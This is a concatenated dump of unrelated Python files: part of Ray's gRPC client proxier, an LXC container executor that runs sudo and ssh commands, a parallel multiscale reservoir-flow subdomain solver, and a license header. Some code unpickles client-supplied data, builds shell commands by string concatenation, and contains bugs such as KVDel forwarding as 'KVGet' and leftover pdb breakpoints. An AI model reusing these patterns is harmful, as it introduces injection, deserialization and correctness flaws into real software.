logger.error("Client connecting with no client_id")
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
return client_id
@dataclass
class SpecificServer:
port: int
process_handle_future: futures.Future
channel: "grpc._channel.Channel"
def is_ready(self) -> bool:
"""Check if the server is ready or not (doesn't block)."""
return self.process_handle_future.done()
def wait_ready(self, timeout: Optional[float] = None) -> None:
"""
Wait for the server to actually start up.
"""
res = self.process_handle_future.result(timeout=timeout)
if res is None:
# This is only set to none when server creation specifically fails.
raise RuntimeError("Server startup failed.")
def poll(self) -> Optional[int]:
"""Check if the process has exited."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
return proc.process.poll()
except futures.TimeoutError:
return
def kill(self) -> None:
"""Try to send a KILL signal to the process."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
proc.process.kill()
except futures.TimeoutError:
# Server has not been started yet.
pass
def set_result(self, proc: Optional[ProcessInfo]) -> None:
"""Set the result of the internal future if it is currently unset."""
if not self.is_ready():
self.process_handle_future.set_result(proc)
def _match_running_client_server(command: List[str]) -> bool:
"""
Detects if the main process in the given command is the RayClient Server.
This works by ensuring that the first three arguments are similar to:
<python> -m ray.util.client.server
"""
flattened = " ".join(command)
rejoined = flattened.split()
if len(rejoined) < 3:
return False
return rejoined[1:3] == ["-m", "ray.util.client.server"]
class ProxyManager():
def __init__(self,
redis_address: Optional[str],
*,
session_dir: Optional[str] = None,
redis_password: Optional[str] = None):
self.servers: Dict[str, SpecificServer] = dict()
self.server_lock = RLock()
self._redis_address = redis_address
self._redis_password = redis_password
self._free_ports: List[int] = list(
range(MIN_SPECIFIC_SERVER_PORT, MAX_SPECIFIC_SERVER_PORT))
self._check_thread = Thread(target=self._check_processes, daemon=True)
self._check_thread.start()
self.fate_share = bool(detect_fate_sharing_support())
self._node: Optional[ray.node.Node] = None
atexit.register(self._cleanup)
def _get_unused_port(self) -> int:
"""
Search for a port in _free_ports that is unused.
"""
with self.server_lock:
num_ports = len(self._free_ports)
for _ in range(num_ports):
port = self._free_ports.pop(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("", port))
except OSError:
self._free_ports.append(port)
continue
finally:
s.close()
return port
raise RuntimeError("Unable to succeed in selecting a random port.")
@property
def redis_address(self) -> str:
"""
Returns the provided Ray Redis address, or creates a new cluster.
"""
if self._redis_address:
return self._redis_address
# Start a new, locally scoped cluster.
connection_tuple = ray.init()
self._redis_address = connection_tuple["redis_address"]
self._session_dir = connection_tuple["session_dir"]
return self._redis_address
@property
def node(self) -> ray.node.Node:
"""Gets a 'ray.Node' object for this node (the head node).
If it does not already exist, one is created using the redis_address.
"""
if self._node:
return self._node
ray_params = RayParams(redis_address=self.redis_address)
if self._redis_password:
ray_params.redis_password = self._redis_password
self._node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
return self._node
def create_specific_server(self, client_id: str) -> SpecificServer:
"""
Create, but do not start, a SpecificServer for a given client. This
method must be called once per client.
"""
with self.server_lock:
assert self.servers.get(client_id) is None, (
f"Server already created for Client: {client_id}")
port = self._get_unused_port()
server = SpecificServer(
port=port,
process_handle_future=futures.Future(),
channel=grpc.insecure_channel(
f"localhost:{port}", options=GRPC_OPTIONS))
self.servers[client_id] = server
return server
def start_specific_server(self, client_id: str,
job_config: JobConfig) -> bool:
"""
Start up a RayClient Server for an incoming client to
communicate with. Returns whether creation was successful.
"""
specific_server = self._get_server_for_client(client_id)
assert specific_server, f"Server has not been created for: {client_id}"
output, error = self.node.get_log_file_handles(
f"ray_client_server_{specific_server.port}", unique=True)
serialized_runtime_env = job_config.get_serialized_runtime_env()
runtime_env = json.loads(serialized_runtime_env)
# Set up the working_dir for the server.
# TODO(edoakes): this should be unified with the worker setup code
# by going through the runtime_env agent.
context = RuntimeEnvContext(
env_vars=runtime_env.get("env_vars"),
resources_dir=self.node.get_runtime_env_dir_path())
working_dir_pkg.setup_working_dir(runtime_env, context)
proc = start_ray_client_server(
self.redis_address,
specific_server.port,
stdout_file=output,
stderr_file=error,
fate_share=self.fate_share,
server_type="specific-server",
serialized_runtime_env=serialized_runtime_env,
serialized_runtime_env_context=context.serialize(),
redis_password=self._redis_password)
# Wait for the process being run to transition from the shim process
# to the actual RayClient Server.
pid = proc.process.pid
if sys.platform != "win32":
psutil_proc = psutil.Process(pid)
else:
psutil_proc = None
# Don't use `psutil` on Win32
while psutil_proc is not None:
if proc.process.poll() is not None:
logger.error(
f"SpecificServer startup failed for client: {client_id}")
break
cmd = psutil_proc.cmdline()
if _match_running_client_server(cmd):
break
logger.debug(
"Waiting for Process to reach the actual client server.")
time.sleep(0.5)
specific_server.set_result(proc)
logger.info(f"SpecificServer started on port: {specific_server.port} "
f"with PID: {pid} for client: {client_id}")
return proc.process.poll() is None
def _get_server_for_client(self,
client_id: str) -> Optional[SpecificServer]:
with self.server_lock:
client = self.servers.get(client_id)
if client is None:
logger.error(f"Unable to find channel for client: {client_id}")
return client
def has_channel(self, client_id: str) -> bool:
server = self._get_server_for_client(client_id)
if server is None:
return False
return server.is_ready()
def get_channel(
self,
client_id: str,
) -> Optional["grpc._channel.Channel"]:
"""
Find the gRPC Channel for the given client_id. This will block until
the server process has started.
"""
server = self._get_server_for_client(client_id)
if server is None:
return None
# Wait for the SpecificServer to become ready.
server.wait_ready()
try:
grpc.channel_ready_future(
server.channel).result(timeout=CHECK_CHANNEL_TIMEOUT_S)
return server.channel
except grpc.FutureTimeoutError:
logger.exception(f"Timeout waiting for channel for {client_id}")
return None
def _check_processes(self):
"""
Keeps the internal servers dictionary up-to-date with running servers.
"""
while True:
with self.server_lock:
for client_id, specific_server in list(self.servers.items()):
if specific_server.poll() is not None:
del self.servers[client_id]
# Port is available to use again.
self._free_ports.append(specific_server.port)
time.sleep(CHECK_PROCESS_INTERVAL_S)
def _cleanup(self) -> None:
"""
Forcibly kill all spawned RayClient Servers. This ensures cleanup
for platforms where fate sharing is not supported.
"""
for server in self.servers.values():
server.kill()
class RayletServicerProxy(ray_client_pb2_grpc.RayletDriverServicer):
def __init__(self, ray_connect_handler: Callable,
proxy_manager: ProxyManager):
self.proxy_manager = proxy_manager
self.ray_connect_handler = ray_connect_handler
def _call_inner_function(
self, request, context,
method: str) -> Optional[ray_client_pb2_grpc.RayletDriverStub]:
client_id = _get_client_id_from_context(context)
chan = self.proxy_manager.get_channel(client_id)
if not chan:
logger.error(f"Channel for Client: {client_id} not found!")
context.set_code(grpc.StatusCode.NOT_FOUND)
return None
stub = ray_client_pb2_grpc.RayletDriverStub(chan)
try:
return getattr(stub, method)(
request, metadata=[("client_id", client_id)])
except Exception:
logger.exception(f"Proxying call to {method} failed!")
def _has_channel_for_request(self, context):
client_id = _get_client_id_from_context(context)
return self.proxy_manager.has_channel(client_id)
def Init(self, request, context=None) -> ray_client_pb2.InitResponse:
return self._call_inner_function(request, context, "Init")
def KVPut(self, request, context=None) -> ray_client_pb2.KVPutResponse:
"""Proxies internal_kv.put.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVPut")
with disable_client_hook():
already_exists = ray.experimental.internal_kv._internal_kv_put(
request.key, request.value, overwrite=request.overwrite)
return ray_client_pb2.KVPutResponse(already_exists=already_exists)
def KVGet(self, request, context=None) -> ray_client_pb2.KVGetResponse:
"""Proxies internal_kv.get.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVGet")
with disable_client_hook():
value = ray.experimental.internal_kv._internal_kv_get(request.key)
return ray_client_pb2.KVGetResponse(value=value)
def KVDel(self, request, context=None) -> ray_client_pb2.KVDelResponse:
"""Proxies internal_kv.delete.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVGet")
with disable_client_hook():
ray.experimental.internal_kv._internal_kv_del(request.key)
return ray_client_pb2.KVDelResponse()
def KVList(self, request, context=None) -> ray_client_pb2.KVListResponse:
"""Proxies internal_kv.list.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVList")
with disable_client_hook():
keys = ray.experimental.internal_kv._internal_kv_list(
request.prefix)
return ray_client_pb2.KVListResponse(keys=keys)
def KVExists(self, request,
context=None) -> ray_client_pb2.KVExistsResponse:
"""Proxies internal_kv.exists.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVExists")
with disable_client_hook():
exists = ray.experimental.internal_kv._internal_kv_exists(
request.key)
return ray_client_pb2.KVExistsResponse(exists=exists)
def ListNamedActors(self, request, context=None
) -> ray_client_pb2.ClientListNamedActorsResponse:
return self._call_inner_function(request, context, "ListNamedActors")
def ClusterInfo(self, request,
context=None) -> ray_client_pb2.ClusterInfoResponse:
# NOTE: We need to respond to the PING request here to allow the client
# to continue with connecting.
if request.type == ray_client_pb2.ClusterInfoType.PING:
resp = ray_client_pb2.ClusterInfoResponse(json=json.dumps({}))
return resp
return self._call_inner_function(request, context, "ClusterInfo")
def Terminate(self, req, context=None):
return self._call_inner_function(req, context, "Terminate")
def GetObject(self, request, context=None):
return self._call_inner_function(request, context, "GetObject")
def PutObject(self, request: ray_client_pb2.PutRequest,
context=None) -> ray_client_pb2.PutResponse:
return self._call_inner_function(request, context, "PutObject")
def WaitObject(self, request, context=None) -> ray_client_pb2.WaitResponse:
return self._call_inner_function(request, context, "WaitObject")
def Schedule(self, task, context=None) -> ray_client_pb2.ClientTaskTicket:
return self._call_inner_function(task, context, "Schedule")
def ray_client_server_env_prep(job_config: JobConfig) -> JobConfig:
return job_config
def prepare_runtime_init_req(init_request: ray_client_pb2.DataRequest
) -> Tuple[ray_client_pb2.DataRequest, JobConfig]:
"""
Extract JobConfig and possibly mutate InitRequest before it is passed to
the specific RayClient Server.
"""
init_type = init_request.WhichOneof("type")
assert init_type == "init", ("Received initial message of type "
f"{init_type}, not 'init'.")
req = init_request.init
job_config = JobConfig()
if req.job_config:
job_config = pickle.loads(req.job_config)
new_job_config = ray_client_server_env_prep(job_config)
modified_init_req = ray_client_pb2.InitRequest(
job_config=pickle.dumps(new_job_config),
ray_init_kwargs=init_request.init.ray_init_kwargs)
init_request.init.CopyFrom(modified_init_req)
return (init_request, new_job_config)
class DataServicerProxy(ray_client_pb2_grpc.RayletDataStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
self.num_clients = 0
self.clients_lock = Lock()
self.proxy_manager = proxy_manager
def modify_connection_info_resp(self,
init_resp: ray_client_pb2.DataResponse
) -> ray_client_pb2.DataResponse:
"""
Modify the `num_clients` returned in the ConnectionInfoResponse because
individual SpecificServers only have **one** client.
"""
init_type = init_resp.WhichOneof("type")
if init_type != "connection_info":
return init_resp
modified_resp = ray_client_pb2.DataResponse()
modified_resp.CopyFrom(init_resp)
with self.clients_lock:
modified_resp.connection_info.num_clients = self.num_clients
return modified_resp
def Datapath(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
# Create Placeholder *before* reading the first request.
server = self.proxy_manager.create_specific_server(client_id)
try:
with self.clients_lock:
self.num_clients += 1
logger.info(f"New data connection from client {client_id}: ")
init_req = next(request_iterator)
try:
modified_init_req, job_config = prepare_runtime_init_req(
init_req)
if not self.proxy_manager.start_specific_server(
client_id, job_config):
logger.error(
f"Server startup failed for client: {client_id}, "
f"using JobConfig: {job_config}!")
raise RuntimeError(
"Starting Ray client server failed. This is most "
"likely because the runtime_env failed to be "
"installed. See ray_client_server_[port].err on the "
"head node of the cluster for the relevant logs.")
channel = self.proxy_manager.get_channel(client_id)
if channel is None:
logger.error(f"Channel not found for {client_id}")
raise RuntimeError(
"Proxy failed to Connect to backend! Check "
"`ray_client_server.err` on the cluster.")
stub = ray_client_pb2_grpc.RayletDataStreamerStub(channel)
except Exception:
init_resp = ray_client_pb2.DataResponse(
init=ray_client_pb2.InitResponse(
ok=False, msg=traceback.format_exc()))
init_resp.req_id = init_req.req_id
yield init_resp
return None
new_iter = chain([modified_init_req], request_iterator)
resp_stream = stub.Datapath(
new_iter, metadata=[("client_id", client_id)])
for resp in resp_stream:
yield self.modify_connection_info_resp(resp)
except Exception:
logger.exception("Proxying Datapath failed!")
finally:
server.set_result(None)
with self.clients_lock:
logger.debug(f"Client detached: {client_id}")
self.num_clients -= 1
class LogstreamServicerProxy(ray_client_pb2_grpc.RayletLogStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
super().__init__()
self.proxy_manager = proxy_manager
def Logstream(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
logger.debug(f"New logstream connection from client {client_id}: ")
channel = None
# We need to retry a few times because the LogClient *may* connect
# before the DataClient has finished connecting.
for i in range(LOGSTREAM_RETRIES):
channel = self.proxy_manager.get_channel(client_id)
if channel is not None:
break
logger.warning(
f"Retrying Logstream connection. {i+1} attempts failed.")
time.sleep(LOGSTREAM_RETRY_INTERVAL_SEC)
if channel is None:
context.set_code(grpc.StatusCode.UNAVAILABLE)
return None
stub = ray_client_pb2_grpc.RayletLogStreamerStub(channel)
resp_stream = stub.Logstream(
request_iterator, metadata=[("client_id", client_id)])
try:
for resp in resp_stream:
yield resp
except Exception:
logger.exception("Proxying Logstream failed!")
def serve_proxier(connection_str: str,
redis_address: Optional[str],
*,
redis_password: Optional[str] = None,
session_dir: Optional[str] = None):
# Initialize internal KV to be used to upload and download working_dir
# before calling ray.init within the RayletServicers.
# NOTE(edoakes): redis_address and redis_password should only be None in
# tests.
if redis_address is not None and redis_password is not None:
ip, port = redis_address.split(":")
gcs_client = connect_to_gcs(ip, int(port), redis_password)
ray.experimental.internal_kv._initialize_internal_kv(gcs_client)
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=CLIENT_SERVER_MAX_THREADS),
options=GRPC_OPTIONS)
proxy_manager = ProxyManager(
redis_address, session_dir=session_dir, redis_password=redis_password)
task_servicer = RayletServicerProxy(None, proxy_manager)
data_servicer = DataServicerProxy(proxy_manager)
logs_servicer = LogstreamServicerProxy(proxy_manager)
ray_client_pb2_grpc.add_RayletDriverServicer_to_server(
task_servicer, server)
ray_client_pb2_grpc.add_RayletDataStreamerServicer_to_server(
data_servicer, server)
ray_client_pb2_grpc.add_RayletLogStreamerServicer_to_server(
logs_servicer, server)
server.add_insecure_port(connection_str)
server.start()
return ClientServerHandle(
task_servicer=task_servicer,
data_servicer=data_servicer,
logs_servicer=logs_servicer,
grpc_server=server,
)
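# A minimal sketch (addresses and password are placeholders) of how a head node might expose
# the proxier and then block on the gRPC server:
#
#   handle = serve_proxier("0.0.0.0:10001", redis_address="127.0.0.1:6379",
#                          redis_password="5241590000000000")
#   handle.grpc_server.wait_for_termination()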
|
lxc_executor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import logging
from vmchecker.generic_executor import Host,VM
_logger = logging.getLogger('vm_executor')
from threading import Thread
import time
class LXCHost(Host):
def getVM(self, bundle_dir, vmcfg, assignment):
return LXCVM(self, bundle_dir, vmcfg, assignment)
class LXCVM(VM):
def __init__(self, host, bundle_dir, vmcfg, assignment):
VM.__init__(self, host, bundle_dir, vmcfg, assignment)
self.hostname = self.machinecfg.get_vmx_path()
def executeCommand(self,cmd):
return self.host.executeCommand("ssh "+self.username+"@"+self.hostname+" "+cmd)
def start(self):
self.host.executeCommand("sudo lxc-start -n "+self.hostname+" -d")
while True:
if self.hasStarted():
return
def stop(self):
self.host.executeCommand("sudo lxc-stop -n "+self.hostname)
    def hasStarted(self):
        time.sleep(1)
        o = self.host.executeCommand("sudo lxc-info -n "+self.hostname)
        if "-1" in o:
            _logger.debug('container %s has not started yet' % self.hostname)
            return False
        if "refused" in self.executeCommand('echo hello'):
            _logger.debug('container %s does not accept ssh connections yet' % self.hostname)
            return False
        return True
def revert(self, number = None):
'''
TODO:
1. replace hardcoded paths with configurable options
2. provide a way for starting multiple containters at the same time
'''
        if number is None:
number = 1
self.host.executeCommand("sudo lxc-stop -n "+self.hostname)
self.host.executeCommand("sudo lxc-restore "+self.hostname+" "+str(number))
def copyTo(self, sourceDir, targetDir, files):
""" Copy files from host(source) to guest(target) """
for f in files:
host_path = os.path.join(sourceDir, f)
guest_path = os.path.join(targetDir, f)
#guest_path = "/var/lib/lxc/"+self.hostname+"/rootfs"+guest_path
if not os.path.exists(host_path):
_logger.error('host file (to send) "%s" does not exist' % host_path)
return
_logger.info('copy file %s from host to guest at %s' % (host_path, guest_path))
#self.host.executeCommand("sudo cp %s %s" % (host_path,guest_path))
self.host.executeCommand("scp -r "+host_path+" "+self.username+"@"+self.hostname+":"+guest_path)
def copyFrom(self, sourceDir, targetDir, files):
""" Copy files from guest(source) to host(target) """
for f in files:
host_path = os.path.join(targetDir, f)
guest_path = os.path.join(sourceDir, f)
#guest_path = "/var/lib/lxc/"+self.hostname+"/rootfs"+guest_path
_logger.info('copy file %s from guest to host at %s' % (guest_path, host_path))
#self.host.executeCommand("sudo cp %s %s" % (guest_path,host_path))
self.host.executeCommand("scp -r "+self.username+"@"+self.hostname+":"+guest_path+" "+host_path)
if not os.path.exists(host_path):
_logger.error('host file (received) "%s" does not exist' % host_path)
def run(self, shell, executable_file, timeout):
self.executeCommand("chmod +x "+ executable_file)
_logger.info('executing on the remote: prog=%s args=[%s] timeout=%d' % (shell, executable_file, timeout))
thd = Thread(target = self.executeCommand, args = (executable_file,))
thd.start()
        if timeout is None:
            thd.join()
        else:
            thd.join(timeout)
        return thd.is_alive()
|
paralel_neuman_new0.py
|
import numpy as np
import scipy.sparse as sp
from ...common_files.common_infos import CommonInfos
import multiprocessing as mp
from ...solvers.solvers_scipy.solver_sp import SolverSp
from ...solvers.solvers_trilinos.solvers_tril import solverTril
import time
class masterNeumanNonNested:
def __init__(self, data_impress, elements_lv0, ml_data, n_levels, T_without, wells, pare=False):
self.data_impress = data_impress
self.elements_lv0 = elements_lv0
self.ml_data = ml_data
self.n_levels = n_levels
self.T_without = T_without
self.wells = wells
self.pare = pare
self.one_worker = True
def get_n_workers(self, list_of_subdomains):
if self.one_worker:
n_cpu = 1
else:
n_cpu = mp.cpu_count()//2 - 1
self.n_workers = n_cpu
list_of_process_per_cpu = []
n_subdomains = len(list_of_subdomains)
resto = n_subdomains % self.n_workers
n_process_per_cpu = n_subdomains//self.n_workers
if n_process_per_cpu > 0:
for i in range(self.n_workers):
list_of_process_per_cpu.append(list_of_subdomains[i*n_process_per_cpu:n_process_per_cpu*(i+1)])
            if resto != 0:
                # hand the remaining (last `resto`) subdomains out one per worker
                for i in range(resto):
                    list_of_process_per_cpu[i].append(list_of_subdomains[-(i+1)])
        else:
            # fewer subdomains than workers: give each worker a single subdomain
            self.n_workers = resto
            for i in range(resto):
                list_of_process_per_cpu.append([list_of_subdomains[i]])
return list_of_process_per_cpu
def get_subdomains(self):
        '''
        Data sent to each worker, in this order:
        volumes: global ids of the local volumes
        ind_diric: indices of the volumes with prescribed pressure
        ind_neum: indices of the volumes with prescribed flow rate
        val_diric: prescribed pressure values
        val_neum: prescribed flow rate values
        local_transm: local transmissibility
        all_faces: all faces of the coarse volume
        intern_faces: internal faces of the coarse volume
        intersect_faces: faces on the intersection
        '''
list_of_subdomains = []
pms_flux_faces = np.zeros(len(self.elements_lv0['faces']))
levels = self.data_impress['LEVEL']
pms = self.data_impress['pms']
remaped_internal_faces = self.elements_lv0['remaped_internal_faces']
neig_internal_faces = self.elements_lv0['neig_internal_faces']
gid0 = self.data_impress['GID_0']
n_volumes = len(levels)
if self.pare:
import pdb; pdb.set_trace()
self.data_impress['val_diric'][:]=0
self.data_impress['val_neum'][:]=0
for level in range(1, self.n_levels):
str_level = str(level)
set_level = set([level])
all_gids_coarse = self.data_impress['GID_'+ str_level]
# all_local_ids_coarse = self.data_impress['COARSE_LOCAL_ID_'+ str_level]
all_intern_boundary_volumes = self.ml_data['internal_boundary_fine_volumes_level_'+ str_level]
all_intersect_faces = self.ml_data['coarse_intersect_faces_level_'+ str_level]
all_intern_faces = self.ml_data['coarse_internal_faces_level_'+ str_level]
all_faces = self.ml_data['coarse_faces_level_'+ str_level]
all_fine_vertex = self.ml_data['fine_vertex_coarse_volumes_level_'+ str_level]
coarse_ids = self.ml_data['coarse_primal_id_level_'+ str_level]
gids_level = np.unique(all_gids_coarse)
for gidc in gids_level:
                intersect_faces = all_intersect_faces[coarse_ids==gidc][0] # faces on the intersection
                intern_local_faces = all_intern_faces[coarse_ids==gidc][0] # internal faces
                faces = all_faces[coarse_ids==gidc][0] # faces of the coarse volume
                intern_boundary_volumes = all_intern_boundary_volumes[coarse_ids==gidc][0] # internal volumes on the boundary
vertex = all_fine_vertex[coarse_ids==gidc]
pressure_vertex = pms[vertex]
volumes = self.elements_lv0['volumes'][all_gids_coarse==gidc]
level_volumes = levels[volumes]
volumes_dirichlet = set(volumes) & set(self.wells['ws_p'])
volumes_neuman = set(volumes) & set(self.wells['ws_q'])
adjs_intersect_faces = neig_internal_faces[remaped_internal_faces[intersect_faces]]
adj_intern_local_faces = neig_internal_faces[remaped_internal_faces[intern_local_faces]]
v0_new = adjs_intersect_faces.copy()
intersect_faces_new = intersect_faces.copy()
intern_boundary_volumes_new = intern_boundary_volumes.copy()
ind_diric = []
ind_neum = []
val_diric = []
val_neum = []
if volumes_dirichlet:
ind_diric += list(volumes_dirichlet)
for v in ind_diric:
val_diric += [self.wells['values_p'][self.wells['ws_p']==v][0]]
inds = ~((v0_new[:,0]==v) | (v0_new[:,1]==v))
intersect_faces_new = intersect_faces_new[inds]
intern_boundary_volumes_new = intern_boundary_volumes_new[~(intern_boundary_volumes_new==v)]
if volumes_neuman:
ind_neum += list(volumes_neuman)
for v in ind_neum:
val_neum += [self.wells['values_q'][self.wells['ws_q']==v][0]]
inds = ~((v0_new[:,0]==v) | (v0_new[:,1]==v))
v0_new = v0_new[inds]
intersect_faces_new = intersect_faces_new[inds]
intern_boundary_volumes_new = intern_boundary_volumes_new[~(intern_boundary_volumes_new==v)]
if len(intern_boundary_volumes_new) > 0:
v0 = v0_new
pms0 = pms[v0[:,0]]
pms1 = pms[v0[:,1]]
t0 = self.data_impress['transmissibility'][intersect_faces_new]
pms_flux_faces_local = get_flux_faces(pms1, pms0, t0)
pms_flux_faces[intersect_faces] = pms_flux_faces_local
lines = np.concatenate([v0[:, 0], v0[:, 1]])
cols = np.repeat(0, len(lines))
data = np.concatenate([pms_flux_faces_local, -pms_flux_faces_local])
flux_pms_volumes = sp.csc_matrix((data, (lines, cols)), shape=(n_volumes, 1)).toarray().flatten()
presc_flux_intern_boundary_volumes = flux_pms_volumes[intern_boundary_volumes_new]
ind_neum += list(intern_boundary_volumes_new)
val_neum += list(presc_flux_intern_boundary_volumes)
if len(ind_diric) == 0:
if set(vertex) & set(ind_neum):
candidatos = set(volumes) - set(ind_neum)
vol = candidatos.pop()
ind_diric += [vol]
val_diric += [pms[vol]]
else:
ind_diric += list(vertex)
val_diric += list(pressure_vertex)
# ind_diric=volumes[level_volumes==1]
# if len(ind_diric)>0:
#
# ind_diric=np.setdiff1d(ind_diric,intern_boundary_volumes_new)
# if len(ind_diric)>0:
# ind_diric=ind_diric[0]
# else:
# ind_diric=vertex
# else:
# ind_diric=vertex
# val_diric=pms[ind_diric]
self.data_impress['val_diric'][ind_diric]=val_diric
self.data_impress['val_neum'][ind_neum]=val_neum
list_of_subdomains.append(Subdomain(volumes, ind_diric, ind_neum, val_diric, val_neum, intern_local_faces, adj_intern_local_faces, self.T_without))
return list_of_subdomains, pms_flux_faces
def get_subdomains_2(self):
        '''
        Data sent to each worker, in this order:
        volumes: global ids of the local volumes
        ind_diric: indices of the volumes with prescribed pressure
        ind_neum: indices of the volumes with prescribed flow rate
        val_diric: prescribed pressure values
        val_neum: prescribed flow rate values
        local_transm: local transmissibility
        all_faces: all faces of the coarse volume
        intern_faces: internal faces of the coarse volume
        intersect_faces: faces on the intersection
        '''
list_of_subdomains = []
pms_flux_faces = np.zeros(len(self.elements_lv0['faces']))
levels = self.data_impress['LEVEL']
pms = self.data_impress['pms']
remaped_internal_faces = self.elements_lv0['remaped_internal_faces']
neig_internal_faces = self.elements_lv0['neig_internal_faces']
gid0 = self.data_impress['GID_0']
n_volumes = len(gid0)
for level in range(1, self.n_levels):
str_level = str(level)
set_level = set([level])
all_gids_coarse = self.data_impress['GID_'+ str_level]
all_intern_boundary_volumes = self.ml_data['internal_boundary_fine_volumes_level_'+ str_level]
all_intersect_faces = self.ml_data['coarse_intersect_faces_level_'+ str_level]
all_intern_faces = self.ml_data['coarse_internal_faces_level_'+ str_level]
all_faces = self.ml_data['coarse_faces_level_'+ str_level]
all_fine_vertex = self.ml_data['fine_vertex_coarse_volumes_level_'+ str_level]
coarse_ids = self.ml_data['coarse_primal_id_level_'+ str_level]
gids_level = np.unique(all_gids_coarse)
import pdb; pdb.set_trace()
def preprocess(self):
list_of_subdomains, self.global_ms_flux_faces = self.get_subdomains()
list_of_process_per_cpu = self.get_n_workers(list_of_subdomains)
return list_of_process_per_cpu
def run(self):
list_of_process_per_cpu = self.preprocess()
master2worker = [mp.Pipe() for _ in range(self.n_workers)]
m2w, w2m = list(zip(*master2worker))
procs = [mp.Process(target=run_thing, args=[LocalSolution(obj, comm)]) for obj, comm in zip(list_of_process_per_cpu, w2m)]
del list_of_process_per_cpu
global_pcorr = np.zeros(len(self.data_impress['GID_0']))
for proc in procs:
proc.start()
for comm in m2w:
msg = comm.recv()
for resp in msg:
faces = resp[0]['faces']
ms_flux = resp[0]['ms_flux_faces']
self.global_ms_flux_faces[faces] = ms_flux
volumes = resp[1]['volumes']
pcorr = resp[1]['pcorr']
global_pcorr[volumes] = pcorr
for proc in procs:
proc.join()
return self.global_ms_flux_faces.copy(), global_pcorr
def get_flux_faces(p1, p0, t0, flux_grav_faces=None):
    if flux_grav_faces is not None:
flux = -((p1 - p0) * t0 - flux_grav_faces)
else:
flux = -((p1 - p0) * t0)
return flux
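# Two-point flux across a face between adjacent volumes 0 and 1:
# flux = -t0 * (p1 - p0), with the gravitational face flux (when given)
# subtracted from the pressure-difference term before the sign change.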
class Subdomain(CommonInfos):
def __init__(self, volumes, ind_diric, ind_neum, val_diric, val_neum,
intern_faces, adjs_intern_faces, T_global):
self.T_local = self.get_local_t(T_global, volumes).tolil()
self.volumes = volumes
self.ids_local = np.arange(len(volumes))
self.ind_diric = ind_diric
self.ind_neum = ind_neum
self.val_diric = val_diric
self.val_neum = val_neum
self.intern_faces = intern_faces
self.adjs_intern_faces = adjs_intern_faces
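        # map_gid_in_lid maps a global volume id to its local index inside this
        # subdomain; entries for volumes outside the subdomain stay at -1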
self.map_gid_in_lid = np.repeat(-1, volumes.max()+1)
self.map_gid_in_lid[volumes] = self.ids_local
class LocalSolution:
def __init__(self, subdomains, comm):
self.subdomains = subdomains
self.comm = comm
def run(self):
data = []
dt = [('faces', int), ('ms_flux_faces', float)]
dt_vol = [('volumes', int), ('pcorr', float)]
solver = solverTril()
for subd in self.subdomains:
volumes = subd.volumes
T_local = subd.T_local
ids_local = subd.ids_local
ind_diric = subd.ind_diric
ind_neum = subd.ind_neum
val_diric = subd.val_diric
val_neum = subd.val_neum
intern_faces = subd.intern_faces
adjs_intern_faces = subd.adjs_intern_faces
map_gid_in_lid = subd.map_gid_in_lid
ind_diric_local = map_gid_in_lid[ind_diric]
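            # impose the Dirichlet conditions: zero the corresponding rows of
            # the local matrix and put 1 on the diagonal so that the solve
            # returns x = val_diric at those volumes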
T_local_2 = T_local.copy()
T_local_2[ind_diric_local] = 0
T_local_2[ind_diric_local, ind_diric_local] = 1
b = np.zeros(len(volumes))
b[map_gid_in_lid[ind_neum]] = val_neum
b[map_gid_in_lid[ind_diric]] = val_diric
T_local_2 = T_local_2.tocsc()
x = solver.solve_linear_problem(T_local_2,b)
# x=a.solve(b)
# print('\n')
# print('pcorr')
# print(x)
# print('val_diric')
# print(val_diric)
# print('\n')
del T_local_2
t0 = T_local[map_gid_in_lid[adjs_intern_faces[:,0]], map_gid_in_lid[adjs_intern_faces[:,1]]].toarray().flatten()
p0 = x[map_gid_in_lid[adjs_intern_faces[:,0]]]
p1 = x[map_gid_in_lid[adjs_intern_faces[:,1]]]
ms_flux = get_flux_faces(p1, p0, t0)
sarray = np.zeros(len(intern_faces), dtype=dt)
sarray['faces'] = intern_faces
sarray['ms_flux_faces'] = ms_flux
sarray_vol = np.zeros(len(volumes), dtype=dt_vol)
sarray_vol['volumes'] = volumes
sarray_vol['pcorr'] = x
data.append([sarray, sarray_vol])
self.comm.send(data)
def run_thing(local_solution_obj):
local_solution_obj.run()
|
polybeast_learner.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
